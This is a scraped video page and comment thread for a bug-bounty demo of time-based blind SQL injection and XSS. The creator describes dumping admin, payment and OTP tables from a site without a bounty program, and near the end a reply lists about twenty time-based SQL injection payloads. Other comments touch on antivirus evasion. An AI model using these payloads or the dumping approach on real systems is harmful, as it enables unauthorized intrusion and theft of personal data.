Это видео недоступно.
Сожалеем об этом.
This Time Based Blind SQL Injection and XSS worth 5000$ Bounty | Bug bounty poc
HTML-код
- Опубликовано: 21 фев 2024
- Disclaimer: This video is for strictly educational and informational purpose only. I own all equipment used for this demonstration. Hacking without permission is illegal so always ensure you have proper authorization before using security tools in any network environment. thanks.
1st. Enjoying watching your poc. Thanks bro.
my pleasure ❤️😇
love you bro, i really liked your poc videos and learned a lot i hope you will never stop to upload this kind of stuff. stay healthy and wealthy forever.
❣
thnq for supporting brother 😇❤️ wait for some days next will is going to be lit..
@@lostsecc thanks for reply, I'm so happy, you have inspired me a lot.
I am learning wapt from few months I cleared concepts about xss,SQL,csrf,ssrf,file inclusion, file uploading, open redirect and from few days ago started to hunt on intrigrity but it's not finding them is not easy as I learned about the bugs. And so got disappointed and depressed but I saw your video idnk I got motivated and feel confident and started to hunt again I also watch other youtubers I didn't get any better one to understand the things except you. Thanks a lot brother 🫂
❤️bro in bug hunting you just need patience and hardwork dont worry if you not get bounty early but your skills does not waste so maybr after some month or year you will got high bounty and there your all time spend on this will be recover so..just focus on learning my reccomendation is to solve portswigger labs that is some high level from bssic to expert after that solve some bwapp & rootme labs that are only for webapp and also watch some medium article there you will got idea and bypass all new techniques and also use twitter there you got many bug hunting stufss & read hackerone reports like if you want to master openredirect or xss read all the hackerone reports there you will get real world example and idea.....if you any premium.courses i will help you jusg msg me in telegram @lostsec msg me through bot i will give you all bundle for webapp that will sure help you ❤️just keep learning keep going this field is different from all so not think that your time waste you learn new new skills stufss daily so just keep going ....❤️🫂
I really learn alot from ur videos keep on and thank's for the great musics too ♥
can i get a good playlist from spotify please ?
i mostly found from instagram and youtube bcz algorithm show to me most bcz i like that type of songs..
@@lostsecc good luck to you
❤️😇
This is awesome work. I am a beginner but learning more and more as I watch you. Please keep the poc's coming.
ywah soon overload in upcomming days...with lots of waf bypass
Bro you must drop your full playlist. all of them are making me understand what you are doing.
great videos btw.
soon i will upload hunting video from start recon to end
@@lostsecc waiting
@@lostsecc waiting
waiting
Waiting bro
When they paid $53 for SQL injection 😢
Make more impact retrieve sensitive info lol 😂
😂
Wow nice find bro! Loving your videos! Thanks for sharing the knowledge!
thnq for supporting brother ❤️😇 its means a lot for me
Literally I'm in love with that boys skills.
😇❤️🥰
@@lostsecc Bro, Do you have to earn any bachelor degree in CS or IT before applying in CEH?
in bug hunting you dont need anything just your skill and hardwork is enough
@@lostseccBro Do you have any bachelor degree in any stream?.
yes
damn after that one you earned a sub great work
❤️😇
would you mind sharing how you have customized WSL?
install ohmyposh themes
@@lostsecc Thank you brother
जय श्री राम 🚩🧡 bhai really appreciate your work and your strategies 🙌
thnq so much brother its means a lot for me ❤️😇
Awesome bro! That’s amazing! You are using WSL2, right? Have you ever had a problem using it in bug bounty?
not single issue till now
Thanks guy for your video, few people do technical videos
Thnq for supporting brother ❤️
Hello can you tell me how you displaying tables in your terminal by manual sql injection? I think you are using sqlmap but i dont know
yes its sqlmap due to privacy and strike i did not show all
@@lostsecc okay thanks and can you tell me or can you make a video or recommend me one how you doing it? I mean you are using manual sql injection and listing tables in sqlmap
superb brother !!!!!!! by the way how you added skulls to the wsl linux
download window terminal from microsoft store and goto setting and change..
Bro you are on fire 🔥 💯
❤️😇🥰
Nice. Shalom. :3 Great song. 🤝🤓
How is this blind xss. In blind xss you send the payload and it gets reflected by the server on some other location so there would be no way to tell if our payload succeeded or not without knowing that location that's why it's called blind xss. What you found was clearly reflected xss can be confirmed by viewing the page source and our payload would be reflected in it.
on the same endpoint blind sqli there so i dont show the exploitation part bcz of yt policy..but i show the data dump by sqlmap
Bro do you show it on telegram,m
great job bro and thanks for sharing, but did you copy the request from burp while using sqlmap or if you don't mind what the sqlmap command that you did look like
no i just use some flags in sql
Great video! can you tell me how do you find your targets and websites. Thanks.
check programs that has mass scopes and domains
Bhai dil khush kar diya may tumhari saari poc dekhta hu Phonk song ke saath maza aa jata hay ❤❤ vibe match hoti hay yaar❤❤
Ek question tha ?
What are you currently studying or what are you doing!!?
BTW bahut hi zyada interest hay bug hunting and cybersec me mera name zeltarox yaad rakhna bro!!
are love you bhai ❤️ i am currently security researcher & full time bug hunter
excellent video :) you should make a video how to deface a website.
Nice bro (sqlmap sql injection💪👍)❤❤
bro make a video on how to start in bug hunting to make money and guide a full path
i am.going to make series of bug hunting soon
Hey I am new in hacking, but seeing your succes I wonder if you could help me find the best way to learn all those skill I will need to make money with this.
yes sure i will make full playlist for that
How to use cmd in window as terminal in kali
use wsl2
Can you make a video on how to customise kalilinux like you have
yes sure
Please make the video Maybe I will delete kali on the VM, there are many problems I think it will be better on wsl2 in terms of speed?
yes wsl2 is fast and simple to use and no more rams and cpu usage
@@lostsecc So please make the video 🌹
sure
Question: Can you report a new bug for each payload ? and so getting multiple bounty?
no
@@lostsecc But how come actually? Because if they resolve the problem for one payload it doesn't mean it's gonna be fixed for all. Meaning if they don't accept your multiple payloads as different bounty then you can wait for them to fix it, and then come back after a few weeks with a different payload actually. And if you tell no because they will register this bug no matter what payload is used, then it would mean that somebody else who finds the same vulnerability but with a different would have no rights to claim it ? But the breach would be still open. I'm puzzled here can you explain to me in details how it works please?
What command you use to extract blind databases? With sql map?
its timebased comand --technique=T
Nice video. Where did you get the SQL payload list from? Also, does Selfeey have a public bug bounty program?
i get it from google just search time based blind sql and selfeey has no any bounty program
@@lostsecc What does the 5K$ in the title mean then? :D
it means its worth 5k$ or more then that if you submit this to bounty platform if its bounty program then its around 50k bcz there is so much sensitive tabless and data you can check clearly including payment details otp details documents etc...
Did you manage to view the records from the DB, or just list the table names?
i dumped admin tables bruhh
Nice video, are you using a virtual machine? Why do you use windows for this type of operation?
its wsl2 kali its lightweight and fast virtual machine consume lots of ram,cpu,storage
you are just something else dude
❤️😇
Finally back❤
❤️
good luck 😊
where do you get CoffinXP ?
Where come from the payloads list that you paste to intruder?
By the way great video
i shared in my telegram
are burp suite free version able to do some of your action? or is there alternative (if any free better)
no pro version has more features and also intruder speed is fast in pro version
@@lostsecc thanks m8, i really like your content, like i kinda want to make cyber security as my other skills, especially in web/api penetration, hope someday u willing to teach us step by step like how to know which website is vurnerable etc
So the payliad will work for search param
after exploiting the XSS, how did you dump all the databases? using burp?
there is also sqli on that param
@@lostsecc yes i got that i mean what tool did you use to dump the databases? sqlmap?
sqlmap
hello please can you tell me, what am i suppose to do when i ask for "bug bounty donation" because all webs just ignore it even when i "help" them and afterwards they fix the issue and vulnerability :( iam sad that i cannot turn some payouts/donations for my skills and educations let me know some tips and tricks bro please
hunt on intigriti
how did you report the vulnerability ? i mean where? i have also found few bugs in this platform how do i report the vulnerability
in openbugbounty program & or in company emails extracted by hunter io
Amazing. Just a request from my side "Can you share the list of all tools and cli tools you use or have installed in your system?"
just type same name that shown in terminal you will find all in github
the one you found db tables with, that is hidden @@lostsecc
Bro may i know how did you detect the bugs? Did you use any automation tools or test manually in detection phase?
i do both soon going to upload full bug hunting series..
@@lostsecc i am waiting .
@@lostsecc thank you. I'm looking forward to watch the series and learn from you
what is a payload to use intruder ?
i sended in my telegram channel
bro you testing sql in burp
how did you get that tables
dm me in telegram
Great man keep going🎉🔥
thnq for supporting brother ❤️
There is no WAF so that made easy for you :) congratulate
there is also payload for wafbypass if it has waf
@@lostsecc
Do you have contact account ?
Nice 😅
how did you manage to have this type of shell on windows because these are linux commands on windows
bcz its wsl2 with kali installed
is burp a more advanced version of insomnia?
yes
Bro you should explain what are you doing as well
waiting full playlist☝️😂
Love you content brother 😍
❤️😇
you just do it with xsstrike or used other tool in this video ??
for xss i used xsstrike only in this video
What was the tool you used for database banner grabbing ? Also can you paste the comand here ? Any reason you have hide that command only showing database names
its sqlmap if i upload full video i will get community strike so i alraday done this and got strike so thats ehy i dont show full demonstrate..
@@lostseccThanks for the response, Great videos. If possible please paste the command you used for sqlmap.
What does the second tab of the terminal have to do with the attack?
It's a list of tables contained in the webserver's database by abusing the SQLi vulnerability via sqlmap.
@@maxrandom569 But would it have any connection with XSS?
no xss is client side issue
What kind of command you used to dump aok databases
bro i'm a newbie and want to learn bug hunting from where i can start
sure ❤️
just send me message in telegram i will send you premium.course free..
may i know, why you use isp and not virtualbox or vmware?
i have both but in virtualbox its lagg so wsl2 is fast and easy
Hey, which terminal you're using i mean how con you run linux command on windows?? plz explain
its wsl2
Bro can you suggest any tutorial/book/course for learning hacking and bug bounty.
If you can drop a course it will be very helpful.
there are many good youtuber learn from then for webhacking i reccomend rana khalil and nahmsec and for lab practice use portswigger labs..best one
Can you make one vedio on how to manually obfuscate any payload?
just url encode and double encode in html or url encoding
@@lostsecc I need to bypass Microsoft defender and other AVs so . Will it work
no its for xss and other payloads for window you use villian and other tools that will work good..checkout my villian tool video you will find what you are looking for
@@lostsecc sure but I want know about how can I manually obfuscate payloads
you need cripter for that
Do the bounties actually pay out?
yes
can you make a video of all the tools you use?? can you tell here?
its xsstrike and sqlmap
Hey bro I like your videos! Can you share your timebased sqli detection wordlist ?
love from Türkiye
yes sure ❤️ dm me on telegram @lostsec
Their bug bounty program is not running then how did you report it?
i reported to there support mail id
Thanks, I get the idea.
hi bro i should start for learning comptia security directly without necessarily going with a+ or I will have to start with a+
these certification only helpful in jobs for bug hunting you dont need anything just learn webappliction and hunt for bugs... btw comptia+ is good also security +
@@lostsecc ok thanks bro i can start network + for good solid base in network and security plus and start bug hunting
@@lostsecc you very good person all the time you answee
❤️😇
Where did you find this company, Don't say Private Program!
Random finding..
Which terminal themes you using in your linux
ohmyposh
How did you get bold and italic youtube name??
from google
Awesome video. Can you tell me what is that coffinxp? Is that linux on windows? And what linux distro is it?
coffinxp is my name bro 😉 and terminal is wls2 kali in window terminal
which VPS are you using? i like your terminal ❤
bruth do have any authanticaton bypass poc ?
its wls2 with window terminal
What programs and tools do you use?
there are many
Do you have any advice for someone who wants to learn about bug bounty?
just have a passion in this field and persistence hard work + do practicle after watching videos solve portswigger labs...
@@lostsecc thank you for the advice, I really appreciate it
Which wordlist are you using?
time based blind sql
Hello how can I learn this skill. I love your videos
just need passion in this filed do practicle after watching videos and solve portswigger labs
Bro, is it possible to get the copy of ur Sqli payloads?
i shared in my telegram channel
Can u share ur telegram link again plz
bro how much you make in a month and tell me how much i can make can i do this as a fulll time and make my whole carrier in this
Daily Driver => windows
Brother, this program is running on which platform?
its not in bounty platform
Thanks for this bro , do you got bountu from them?
nope
Can you please share time based sql injection all payloads?
SELECT CASE WHEN (1=1) THEN pg_sleep(25) ELSE pg_sleep(0) END--
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
1'=sleep(25)='1
'%2b(select*from(select(sleep(2)))a)%2b'
WAITFOR DELAY '0:0:25';--
OR SLEEP(25)
AND SLEEP(25) AND ('kleiton'='kleiton
WAITFOR DELAY '0:0:25' and 'a'='a;--
IF 1=1 THEN dbms_lock.sleep(25);
SLEEP(25)
pg_sleep(25)
and if(substring(user(),1,1)>=chr(97),SLEEP(25),1)--
DBMS_LOCK.SLEEP(25);
AND if not(substring((select @version),25,1) < 52) waitfor delay '0:0:25'--
1,'0');waitfor delay '0:0:25;--
(SELECT 1 FROM (SELECT SLEEP(25))A)
%2b(select*from(select(sleep(25)))a)%2b'
/**/xor/**/sleep(25)
or (sleep(25)+1) limit 1 --
Bro apni video ma apna voice over karo bhi
What laptop do you use if you can let me know?
hp
is it any specific model like pavilion for example? i'm searching for a laptop for myself so that's why i ask@@lostsecc
asus tuff is best in budget but hp pavillion is my fav bcz i like its look and slim body..
How to connect you ?
Bro what is the name of the terminal you have and how to install it u wanab know
window terminal with kali installed with wsl2 with ohmyposh custom theme
What tool did you used to extract database and also i joined your telegram group
there are many tools i will soon upload all
@@lostsecc bro recently I tried a SQL injection on a target and I got 6 seconds of delay and I extracted a table name also but they are saying they can't reproduce attack and want they me extract another table name
dm me.i will.give you command to extract full tabless and data @lostsec
Cool
Hi bro awesome vid, what is the song plying?
its aurora slowed reverb ❤️
@@lostsecc awesome, thx brother
They don't have bug bounty program, how could you get 5k?
i said its worth 5k.but if its bounty program.its more then that sql injection start with 5k+ to 50000+ $ depend on the target acusition
Okay, I think I'm misunderstanding here. lol
Hey, dude, is it possible for you to add some narrations in your future videos so we can better understand?
@@lostsecc
Nice work
thnq bro ❤️
how do u know this , do u studied it or cyber security ?
i am security researcher & bug hunter
Good video bro.
How did you customize the terminal?
kalilinux in wsl2 with ohmyposh customization
bro which terminal you used is it linux terminal
window terminal with wsl2
Good job bro ❤
thnq bro ❤️😇
I need background such as your terminal 🙂💔
install wsl2 kali in window terminal
$5000 😳🔥🔥🔥
Bro where you collected this all payload can you share with me 🥺 big fan
search search in google blind sql injection payload list
how much u are earning in a month by bug hunting and how much you have given time
i am.full time bug hunter 24/7
how much u make in a month@@lostsecc
how much you earn in a month and give me a idea how much i can make in this field can i make a carrier and devote my life in bug bounty@@lostsecc
🎉
❤️